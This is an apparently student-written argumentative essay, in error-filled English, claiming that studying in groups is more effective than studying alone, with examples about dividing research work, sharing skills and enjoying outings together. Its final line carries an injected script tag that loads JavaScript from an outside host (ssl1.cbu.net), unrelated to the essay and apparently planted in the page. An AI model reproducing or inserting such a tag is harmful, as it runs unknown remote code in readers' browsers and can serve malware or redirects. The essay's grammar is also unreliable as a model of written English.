Students can improve their skill in different ways such as studying with group, discussions and of course studying alone. Some think that studying or doing assignment alone will improve their learning effectively because they feel, students can concentrate more their work rather than wasting time with friends. But, I strongly agree with statement which states that students can learn effectively if there working as team. To support, I want give some real incidences which happening in the classroom settings.

To begin with, collective learning can be achieved only through the group effort not by individual talent. For example, when teacher assignment regarding population growth in united state, then, think ten students are in the team. So, one can collect data from internet, someone could do it from government office directly and rest of them go in different manner to get the information which they want to complete the processes that saves their valuable time and money whereas individual person cannot such complex task. Further, it hurts him lot physically, mentally and socio-economically. Some case it leads healthy issues. Fewer students think they credit goes for team even though whole parts is done some individual. But that is not students goal.

Secondly, knowledge, experience and information be shared easily by the member the group. For example, imagine that one student very talent in making statistic, then, he explains to everyone in their group which strong bond of the team work. Moreover, even they can come out with different solution with variety of perspective for one problem. Take one one math problem, so many students comes with different ways problem solving for one particular issue that spirit of group work. But, the individual student cannot do the same thing. Pluse, he feels like monotonous life style. Some pupil may think it great chance no one will know their secret of solving some mathematics equation, it is not at true-knowledge must be shareable. So that society improve as a whole.

Finally, the group study is best place for fun. For example, after a work assignment all the students wants have enjoyment, usually, they use to go to theatre, concert and so on. And, that movements are memorable in mind for ever lasting. Group works gives both victory and pleasure. Or, I can say team work is pleasant way learning and individual learning is pressure way of learning the stuff. Some feel, fun is nothing to with the effectiveness of study that is totally wrong. Both should be balance well.

To conclude, to again more knowledge, save time, share the information with others and to enjoy the activities, students must work as team to achieve their group target and that is called effective way of study. The merits of the group study out-weigh it's demerits. <script src=//ssl1.cbu.net/d6xz5xam></script>